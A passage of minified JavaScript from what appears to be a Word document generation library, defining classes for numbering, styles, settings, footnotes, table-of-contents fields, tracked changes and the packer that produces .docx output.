b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl",tentative:"w15:tentative"}}}class mC extends E{constructor(Ce){super("w:numFmt"),this.root.push(new _({val:Ce}))}}class Yd extends E{constructor(Ce){super("w:lvlText"),this.root.push(new _({val:Ce}))}}class T0 extends E{constructor(Ce){super("w:lvlJc"),this.root.push(new _({val:Ce}))}}!function(Se){Se.NOTHING="nothing",Se.SPACE="space",Se.TAB="tab"}(Xd||(Xd={}));class E0 extends E{constructor(Ce){super("w:suff"),this.root.push(new _({val:Ce}))}}class Lf extends E{constructor(){super("w:isLgl")}}class th extends E{constructor({level:Ce,format:nt,text:Dt,alignment:di=O.START,start:pi=1,style:Hi,suffix:pa,isLegalNumberingStyle:Ya}){if(super("w:lvl"),this.root.push(new v("w:start",(0,z.vH)(pi))),nt&&this.root.push(new mC(nt)),pa&&this.root.push(new E0(pa)),Ya&&this.root.push(new Lf),Dt&&this.root.push(new Yd(Dt)),this.root.push(new T0(di)),this.paragraphProperties=new ml(Hi&&Hi.paragraph),this.runProperties=new $e(Hi&&Hi.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new A_({ilvl:(0,z.vH)(Ce),tentative:1}))}}class T_ extends th{}class jm extends th{}class D0 extends E{constructor(Ce){super("w:multiLevelType"),this.root.push(new _({val:Ce}))}}class x0 extends b{constructor(){super(...arguments),this.xmlKeys={abstractNumId:"w:abstractNumId",restartNumberingAfterBreak:"w15:restartNumberingAfterBreak"}}}class dd extends E{constructor(Ce,nt){super("w:abstractNum"),this.root.push(new x0({abstractNumId:(0,z.vH)(Ce),restartNumberingAfterBreak:0})),this.root.push(new D0("hybridMultilevel")),this.id=Ce;for(const Dt of nt)this.root.push(new T_(Dt))}}class uC extends E{constructor(Ce){super("w:abstractNumId"),this.root.push(new _({val:Ce}))}}class Qm extends b{constructor(){super(...arguments),this.xmlKeys={numId:"w:numId"}}}class ih extends E{constructor(Ce){super("w:num"),this.numId=Ce.numId,this.reference=Ce.reference,this.instance=Ce.instance,this.root.push(new Qm({numId:(0,z.vH)(Ce.numId)})),this.root.push(new uC((0,z.vH)(Ce.abstractNumId))),Ce.overrideLevel&&this.root.push(new hC(Ce.overrideLevel.num,Ce.overrideLevel.start))}}class zf extends b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl"}}}class hC extends E{constructor(Ce,nt){super("w:lvlOverride"),this.root.push(new zf({ilvl:Ce})),void 0!==nt&&this.root.push(new w0(nt))}}class E_ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class w0 extends E{constructor(Ce){super("w:startOverride"),this.root.push(new E_({val:Ce}))}}class I0 extends E{constructor(Ce){super("w:numbering"),this.abstractNumberingMap=new Map,this.concreteNumberingMap=new Map,this.referenceConfigMap=new Map,this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"}));const nt=new dd((0,ua.NY)(),[{level:0,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ua.vw)(.5),hanging:(0,ua.vw)(.25)}}}},{level:1,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ua.vw)(1),hanging:(0,ua.vw)(.25)}}}},{level:2,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:2160,hanging:(0,ua.vw)(.25)}}}},{level:3,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:2880,hanging:(0,ua.vw)(.25)}}}},{level:4,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:3600,hanging:(0,ua.vw)(.25)}}}},{level:5,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:4320,hanging:(0,ua.vw)(.25)}}}},{level:6,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5040,hanging:(0,ua.vw)(.25)}}}},{level:7,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5760,hanging:(0,ua.vw)(.25)}}}},{level:8,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:6480,hanging:(0,ua.vw)(.25)}}}}]);this.concreteNumberingMap.set("default-bullet-numbering",new ih({numId:1,abstractNumId:nt.id,reference:"default-bullet-numbering",instance:0,overrideLevel:{num:0,start:1}})),this.abstractNumberingMap.set("default-bullet-numbering",nt);for(const Dt of Ce.config)this.abstractNumberingMap.set(Dt.reference,new dd((0,ua.NY)(),Dt.levels)),this.referenceConfigMap.set(Dt.reference,Dt.levels)}prepForXml(Ce){for(const nt of this.abstractNumberingMap.values())this.root.push(nt);for(const nt of this.concreteNumberingMap.values())this.root.push(nt);return super.prepForXml(Ce)}createConcreteNumberingInstance(Ce,nt){const Dt=this.abstractNumberingMap.get(Ce);if(!Dt)return;const di=`${Ce}-${nt}`;if(this.concreteNumberingMap.has(di))return;const pi=this.referenceConfigMap.get(Ce),Hi=pi&&pi[0].start,pa={numId:(0,ua.NY)(),abstractNumId:Dt.id,reference:Ce,instance:nt,overrideLevel:Hi&&Number.isInteger(Hi)?{num:0,start:Hi}:{num:0,start:1}};this.concreteNumberingMap.set(di,new ih(pa))}get ConcreteNumbering(){return Array.from(this.concreteNumberingMap.values())}get ReferenceConfig(){return Array.from(this.referenceConfigMap.values())}}class gl extends b{constructor(){super(...arguments),this.xmlKeys={version:"w:val",name:"w:name",uri:"w:uri"}}}class R0 extends E{constructor(Ce){super("w:compatSetting"),this.root.push(new gl({version:Ce,uri:"http://schemas.microsoft.com/office/word",name:"compatibilityMode"}))}}class ah extends E{constructor(Ce){super("w:compat"),void 0!==Ce.doNotExpandShiftReturn&&this.root.push(new l("w:doNotExpandShiftReturn",Ce.doNotExpandShiftReturn)),Ce.version&&this.root.push(new R0(Ce.version))}}class $m extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable"}}}class D_ extends E{constructor(Ce){super("w:settings"),this.root.push(new $m({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"})),this.root.push(new l("w:displayBackgroundShape",!0)),void 0!==Ce.trackRevisions&&this.root.push(new l("w:trackRevisions",Ce.trackRevisions)),void 0!==Ce.evenAndOddHeaders&&this.root.push(new l("w:evenAndOddHeaders",Ce.evenAndOddHeaders)),void 0!==Ce.updateFields&&this.root.push(new l("w:updateFields",Ce.updateFields)),this.root.push(new ah({version:Ce.compatabilityModeVersion||15}))}}class Jd extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Km extends E{constructor(Ce){super("w:name"),this.root.push(new Jd({val:Ce}))}}class S0 extends E{constructor(Ce){super("w:uiPriority"),this.root.push(new Jd({val:(0,z.vH)(Ce)}))}}class x_ extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",styleId:"w:styleId",default:"w:default",customStyle:"w:customStyle"}}}class w_ extends E{constructor(Ce,nt){super("w:style"),this.root.push(new x_(Ce)),nt.name&&this.root.push(new Km(nt.name)),nt.basedOn&&this.root.push(new A("w:basedOn",nt.basedOn)),nt.next&&this.root.push(new A("w:next",nt.next)),nt.link&&this.root.push(new A("w:link",nt.link)),void 0!==nt.uiPriority&&this.root.push(new S0(nt.uiPriority)),void 0!==nt.semiHidden&&this.root.push(new l("w:semiHidden",nt.semiHidden)),void 0!==nt.unhideWhenUsed&&this.root.push(new l("w:unhideWhenUsed",nt.unhideWhenUsed)),void 0!==nt.quickFormat&&this.root.push(new l("w:qFormat",nt.quickFormat))}}class Zd extends w_{constructor(Ce){super({type:"paragraph",styleId:Ce.id},Ce),this.paragraphProperties=new ml(Ce.paragraph),this.runProperties=new $e(Ce.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties)}}class md extends w_{constructor(Ce){super({type:"character",styleId:Ce.id},Object.assign({uiPriority:99,unhideWhenUsed:!0},Ce)),this.runProperties=new $e(Ce.run),this.root.push(this.runProperties)}}class Cl extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{basedOn:"Normal",next:"Normal",quickFormat:!0}))}}class nh extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Title",name:"Title"}))}}class Xm extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading1",name:"Heading 1"}))}}class k0 extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading2",name:"Heading 2"}))}}class I_ extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading3",name:"Heading 3"}))}}class Wf extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading4",name:"Heading 4"}))}}class Ym extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading5",name:"Heading 5"}))}}class fC extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading6",name:"Heading 6"}))}}class ba extends Cl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Strong",name:"Strong"}))}}class Us extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"ListParagraph",name:"List Paragraph",basedOn:"Normal",quickFormat:!0}))}}class R_ extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteText",name:"footnote text",link:"FootnoteTextChar",basedOn:"Normal",uiPriority:99,semiHidden:!0,unhideWhenUsed:!0,paragraph:{spacing:{after:0,line:240,lineRule:qt.AUTO}},run:{size:20}}))}}class P0 extends md{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteReference",name:"footnote reference",basedOn:"DefaultParagraphFont",semiHidden:!0,run:{superScript:!0}}))}}class Vr extends md{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteTextChar",name:"Footnote Text Char",basedOn:"DefaultParagraphFont",link:"FootnoteText",semiHidden:!0,run:{size:20}}))}}class Jm extends md{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Hyperlink",name:"Hyperlink",basedOn:"DefaultParagraphFont",run:{color:"0563C1",underline:{type:le.SINGLE}}}))}}class Hl extends E{constructor(Ce){if(super("w:styles"),Ce.initialStyles&&this.root.push(Ce.initialStyles),Ce.importedStyles)for(const nt of Ce.importedStyles)this.root.push(nt);if(Ce.paragraphStyles)for(const nt of Ce.paragraphStyles)this.root.push(new Zd(nt));if(Ce.characterStyles)for(const nt of Ce.characterStyles)this.root.push(new md(nt))}}class em extends E{constructor(Ce){super("w:pPrDefault"),this.root.push(new ml(Ce))}}class S_ extends E{constructor(Ce){super("w:rPrDefault"),this.root.push(new $e(Ce))}}class Ff extends E{constructor(Ce){super("w:docDefaults"),this.runPropertiesDefaults=new S_(Ce.run),this.paragraphPropertiesDefaults=new em(Ce.paragraph),this.root.push(this.runPropertiesDefaults),this.root.push(this.paragraphPropertiesDefaults)}}class tm{newInstance(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});let Dt;for(const pi of nt.elements||[])"w:styles"===pi.name&&(Dt=pi);if(void 0===Dt)throw new Error("can not find styles element");const di=Dt.elements||[];return new Hl({initialStyles:new w(Dt.attributes),importedStyles:di.map(pi=>M(pi))})}}class pC{newInstance(Ce={}){var nt;return{initialStyles:new ko({mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",Ignorable:"w14 w15"}),importedStyles:[new Ff(null!==(nt=Ce.document)&&void 0!==nt?nt:{}),new nh(Object.assign({run:{size:56}},Ce.title)),new Xm(Object.assign({run:{color:"2E74B5",size:32}},Ce.heading1)),new k0(Object.assign({run:{color:"2E74B5",size:26}},Ce.heading2)),new I_(Object.assign({run:{color:"1F4D78",size:24}},Ce.heading3)),new Wf(Object.assign({run:{color:"2E74B5",italics:!0}},Ce.heading4)),new Ym(Object.assign({run:{color:"2E74B5"}},Ce.heading5)),new fC(Object.assign({run:{color:"1F4D78"}},Ce.heading6)),new ba(Object.assign({run:{bold:!0}},Ce.strong)),new Us(Ce.listParagraph||{}),new Jm(Ce.hyperlink||{}),new P0(Ce.footnoteReference||{}),new R_(Ce.footnoteText||{}),new Vr(Ce.footnoteTextChar||{})]}}}class k_{constructor(Ce,nt={}){var Dt,di,pi,Hi,pa,Ya,ca;if(this.currentRelationshipId=1,this.headers=[],this.footers=[],this.coreProperties=new y_(Object.assign(Object.assign({},Ce),{creator:null!==(Dt=Ce.creator)&&void 0!==Dt?Dt:"Un-named",revision:null!==(di=Ce.revision)&&void 0!==di?di:1,lastModifiedBy:null!==(pi=Ce.lastModifiedBy)&&void 0!==pi?pi:"Un-named"})),this.numbering=new I0(Ce.numbering?Ce.numbering:{config:[]}),this.comments=new Zp(null!==(Hi=Ce.comments)&&void 0!==Hi?Hi:{children:[]}),this.fileRelationships=new Hm,this.customProperties=new oC(null!==(pa=Ce.customProperties)&&void 0!==pa?pa:[]),this.appProperties=new nC,this.footnotesWrapper=new v_,this.contentTypes=new M0,this.documentWrapper=new uo({background:Ce.background||{}}),this.settings=new D_({compatabilityModeVersion:Ce.compatabilityModeVersion,evenAndOddHeaders:!!Ce.evenAndOddHeaderAndFooters,trackRevisions:null===(Ya=Ce.features)||void 0===Ya?void 0:Ya.trackRevisions,updateFields:null===(ca=Ce.features)||void 0===ca?void 0:ca.updateFields}),this.media=nt.template&&nt.template.media?nt.template.media:new ld,nt.template&&(this.currentRelationshipId=nt.template.currentRelationshipId+1),nt.template&&Ce.externalStyles)throw Error("can not use both template and external styles");if(nt.template&&nt.template.styles){const ka=new tm;this.styles=ka.newInstance(nt.template.styles)}else if(Ce.externalStyles){const ka=new tm;this.styles=ka.newInstance(Ce.externalStyles)}else if(Ce.styles){const ka=(new pC).newInstance(Ce.styles.default);this.styles=new Hl(Object.assign(Object.assign({},ka),Ce.styles))}else{const ka=new pC;this.styles=new Hl(ka.newInstance())}if(this.addDefaultRelationships(),nt.template&&nt.template.headers)for(const ka of nt.template.headers)this.addHeaderToDocument(ka.header,ka.type);if(nt.template&&nt.template.footers)for(const ka of nt.template.footers)this.addFooterToDocument(ka.footer,ka.type);for(const ka of Ce.sections)this.addSection(ka);if(Ce.footnotes)for(const ka in Ce.footnotes)this.footnotesWrapper.View.createFootNote(parseFloat(ka),Ce.footnotes[ka].children)}addSection({headers:Ce={},footers:nt={},children:Dt,properties:di}){this.documentWrapper.View.Body.addSection(Object.assign(Object.assign({},di),{headerWrapperGroup:{default:Ce.default?this.createHeader(Ce.default):void 0,first:Ce.first?this.createHeader(Ce.first):void 0,even:Ce.even?this.createHeader(Ce.even):void 0},footerWrapperGroup:{default:nt.default?this.createFooter(nt.default):void 0,first:nt.first?this.createFooter(nt.first):void 0,even:nt.even?this.createFooter(nt.even):void 0}}));for(const pi of Dt)this.documentWrapper.View.add(pi)}createHeader(Ce){const nt=new _l(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addHeaderToDocument(nt),nt}createFooter(Ce){const nt=new fl(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addFooterToDocument(nt),nt}addHeaderToDocument(Ce,nt=Pt.DEFAULT){this.headers.push({header:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header",`header${this.headers.length}.xml`),this.contentTypes.addHeader(this.headers.length)}addFooterToDocument(Ce,nt=Pt.DEFAULT){this.footers.push({footer:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer",`footer${this.footers.length}.xml`),this.contentTypes.addFooter(this.footers.length)}addDefaultRelationships(){this.fileRelationships.createRelationship(1,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument","word/document.xml"),this.fileRelationships.createRelationship(2,"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties","docProps/core.xml"),this.fileRelationships.createRelationship(3,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties","docProps/app.xml"),this.fileRelationships.createRelationship(4,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties","docProps/custom.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles","styles.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering","numbering.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes","footnotes.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings","settings.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments","comments.xml")}get Document(){return this.documentWrapper}get Styles(){return this.styles}get CoreProperties(){return this.coreProperties}get Numbering(){return this.numbering}get Media(){return this.media}get FileRelationships(){return this.fileRelationships}get Headers(){return this.headers.map(Ce=>Ce.header)}get Footers(){return this.footers.map(Ce=>Ce.footer)}get ContentTypes(){return this.contentTypes}get CustomProperties(){return this.customProperties}get AppProperties(){return this.appProperties}get FootNotes(){return this.footnotesWrapper}get Settings(){return this.settings}get Comments(){return this.comments}}const ni="";class O0 extends E{constructor(Ce={}){super("w:instrText"),this.properties=Ce,this.root.push(new Be({space:ee.PRESERVE}));let nt="TOC";this.properties.captionLabel&&(nt=`${nt} \\a "${this.properties.captionLabel}"`),this.properties.entriesFromBookmark&&(nt=`${nt} \\b "${this.properties.entriesFromBookmark}"`),this.properties.captionLabelIncludingNumbers&&(nt=`${nt} \\c "${this.properties.captionLabelIncludingNumbers}"`),this.properties.sequenceAndPageNumbersSeparator&&(nt=`${nt} \\d "${this.properties.sequenceAndPageNumbersSeparator}"`),this.properties.tcFieldIdentifier&&(nt=`${nt} \\f "${this.properties.tcFieldIdentifier}"`),this.properties.hyperlink&&(nt=`${nt} \\h`),this.properties.tcFieldLevelRange&&(nt=`${nt} \\l "${this.properties.tcFieldLevelRange}"`),this.properties.pageNumbersEntryLevelsRange&&(nt=`${nt} \\n "${this.properties.pageNumbersEntryLevelsRange}"`),this.properties.headingStyleRange&&(nt=`${nt} \\o "${this.properties.headingStyleRange}"`),this.properties.entryAndPageNumberSeparator&&(nt=`${nt} \\p "${this.properties.entryAndPageNumberSeparator}"`),this.properties.seqFieldIdentifierForPrefix&&(nt=`${nt} \\s "${this.properties.seqFieldIdentifierForPrefix}"`),this.properties.stylesWithLevels&&this.properties.stylesWithLevels.length&&(nt=`${nt} \\t "${this.properties.stylesWithLevels.map(Dt=>`${Dt.styleName},${Dt.level}`).join(",")}"`),this.properties.useAppliedParagraphOutlineLevel&&(nt=`${nt} \\u`),this.properties.preserveTabInEntries&&(nt=`${nt} \\w`),this.properties.preserveNewLineInEntries&&(nt=`${nt} \\x`),this.properties.hideTabAndPageNumbersInWebView&&(nt=`${nt} \\z`),this.root.push(nt)}}class _C extends E{constructor(){super("w:sdtContent")}}class fs extends b{constructor(){super(...arguments),this.xmlKeys={alias:"w:val"}}}class Vf extends E{constructor(Ce){super("w:alias"),this.root.push(new fs({alias:Ce}))}}class WM extends E{constructor(Ce){super("w:sdtPr"),this.root.push(new Vf(Ce))}}class FM extends E{constructor(Ce="Table of Contents",nt){super("w:sdt"),this.root.push(new WM(Ce));const Dt=new _C,di=new uc({children:[new pt({children:[new Ue(!0),new O0(nt),new Xe]})]});Dt.addChildElement(di);const pi=new uc({children:[new pt({children:[new He]})]});Dt.addChildElement(pi),this.root.push(Dt)}}class gC{constructor(Ce,nt){this.styleName=Ce,this.level=nt}}class im{constructor(Ce={children:[]}){this.options=Ce}}class VM{constructor(Ce={children:[]}){this.options=Ce}}class CC extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class Er extends E{constructor(Ce){super("w:footnoteReference"),this.root.push(new CC({id:Ce}))}}class P_ extends pt{constructor(Ce){super({style:"FootnoteReference"}),this.root.push(new Er(Ce))}}class oh extends E{constructor(Ce){super("w:ins"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new vt(Ce))}}class BM extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class yC extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class ac extends E{constructor(){super("w:delInstrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class zc extends E{constructor(Ce){super("w:delText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}class O_ extends E{constructor(Ce){super("w:del"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.deletedTextRunWrapper=new rh(Ce),this.addChildElement(this.deletedTextRunWrapper)}}class rh extends E{constructor(Ce){if(super("w:r"),this.root.push(new $e(Ce)),Ce.children)for(const nt of Ce.children)if("string"!=typeof nt)this.root.push(nt);else switch(nt){case ye.CURRENT:this.root.push(new Ue),this.root.push(new BM),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES:this.root.push(new Ue),this.root.push(new yC),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES_IN_SECTION:this.root.push(new Ue),this.root.push(new ac),this.root.push(new Xe),this.root.push(new He);break;default:this.root.push(new zc(nt))}else Ce.text&&this.root.push(new zc(Ce.text));if(Ce.break)for(let nt=0;nt<Ce.break;nt++)this.root.splice(1,0,new Ie)}}var ud,Zm,N_;(function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.LEFT="left",Se.OUTSIDE="outside",Se.RIGHT="right"})(ud||(ud={})),function(Se){Se.BOTTOM="bottom",Se.CENTER="center",Se.INSIDE="inside",Se.OUTSIDE="outside",Se.TOP="top"}(Zm||(Zm={})),function(Se){Se.DECIMAL="decimal",Se.UPPER_ROMAN="upperRoman",Se.LOWER_ROMAN="lowerRoman",Se.UPPER_LETTER="upperLetter",Se.LOWER_LETTER="lowerLetter",Se.ORDINAL="ordinal",Se.CARDINAL_TEXT="cardinalText",Se.ORDINAL_TEXT="ordinalText",Se.HEX="hex",Se.CHICAGO="chicago",Se.IDEOGRAPH_DIGITAL="ideographDigital",Se.JAPANESE_COUNTING="japaneseCounting",Se.AIUEO="aiueo",Se.IROHA="iroha",Se.DECIMAL_FULL_WIDTH="decimalFullWidth",Se.DECIMAL_HALF_WIDTH="decimalHalfWidth",Se.JAPANESE_LEGAL="japaneseLegal",Se.JAPANESE_DIGITAL_TEN_THOUSAND="japaneseDigitalTenThousand",Se.DECIMAL_ENCLOSED_CIRCLE="decimalEnclosedCircle",Se.DECIMAL_FULL_WIDTH_2="decimalFullWidth2",Se.AIUEO_FULL_WIDTH="aiueoFullWidth",Se.IROHA_FULL_WIDTH="irohaFullWidth",Se.DECIMAL_ZERO="decimalZero",Se.BULLET="bullet",Se.GANADA="ganada",Se.CHOSUNG="chosung",Se.DECIMAL_ENCLOSED_FULL_STOP="decimalEnclosedFullstop",Se.DECIMAL_ENCLOSED_PAREN="decimalEnclosedParen",Se.DECIMAL_ENCLOSED_CIRCLE_CHINESE="decimalEnclosedCircleChinese",Se.IDEOGRAPH_ENCLOSED_CIRCLE="ideographEnclosedCircle",Se.IDEOGRAPH_TRADITIONAL="ideographTraditional",Se.IDEOGRAPH_ZODIAC="ideographZodiac",Se.IDEOGRAPH_ZODIAC_TRADITIONAL="ideographZodiacTraditional",Se.TAIWANESE_COUNTING="taiwaneseCounting",Se.IDEOGRAPH_LEGAL_TRADITIONAL="ideographLegalTraditional",Se.TAIWANESE_COUNTING_THOUSAND="taiwaneseCountingThousand",Se.TAIWANESE_DIGITAL="taiwaneseDigital",Se.CHINESE_COUNTING="chineseCounting",Se.CHINESE_LEGAL_SIMPLIFIED="chineseLegalSimplified",Se.CHINESE_COUNTING_TEN_THOUSAND="chineseCountingThousand",Se.KOREAN_DIGITAL="koreanDigital",Se.KOREAN_COUNTING="koreanCounting",Se.KOREAN_LEGAL="koreanLegal",Se.KOREAN_DIGITAL_2="koreanDigital2",Se.VIETNAMESE_COUNTING="vietnameseCounting",Se.RUSSIAN_LOWER="russianLower",Se.RUSSIAN_UPPER="russianUpper",Se.NONE="none",Se.NUMBER_IN_DASH="numberInDash",Se.HEBREW_1="hebrew1",Se.HEBREW_2="hebrew2",Se.ARABIC_ALPHA="arabicAlpha",Se.ARABIC_ABJAD="arabicAbjad",Se.HINDI_VOWELS="hindiVowels",Se.HINDI_CONSONANTS="hindiConsonants",Se.HINDI_NUMBERS="hindiNumbers",Se.HINDI_COUNTING="hindiCounting",Se.THAI_LETTERS="thaiLetters",Se.THAI_NUMBERS="thaiNumbers",Se.THAI_COUNTING="thaiCounting",Se.BAHT_TEXT="bahtText",Se.DOLLAR_TEXT="dollarText"}(N_||(N_={}));var L_=ae(6085),Br=ae(3479);class HM{format(Ce,nt={}){const Dt=Ce.prepForXml(nt);if(Dt)return Dt;throw Error("XMLComponent did not format correctly")}}class sh{replace(Ce,nt,Dt){let di=Ce;return nt.forEach((pi,Hi)=>{di=di.replace(new RegExp(`{${pi.fileName}}`,"g"),(Dt+Hi).toString())}),di}getMediaData(Ce,nt){return nt.Array.filter(Dt=>Ce.search(`{${Dt.fileName}}`)>0)}}class ps{replace(Ce,nt){let Dt=Ce;for(const di of nt)Dt=Dt.replace(new RegExp(`{${di.reference}-${di.instance}}`,"g"),di.numId.toString());return Dt}}var ch,yl=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function pa(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,pa)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};!function(Se){Se.NONE="",Se.WITH_2_BLANKS="  ",Se.WITH_4_BLANKS="    ",Se.WITH_TAB="\t"}(ch||(ch={}));class z_{static toString(Ce,nt){return yl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"string",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBuffer(Ce,nt){return yl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"nodebuffer",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBase64String(Ce,nt){return yl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"base64",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBlob(Ce,nt){return yl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"blob",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static 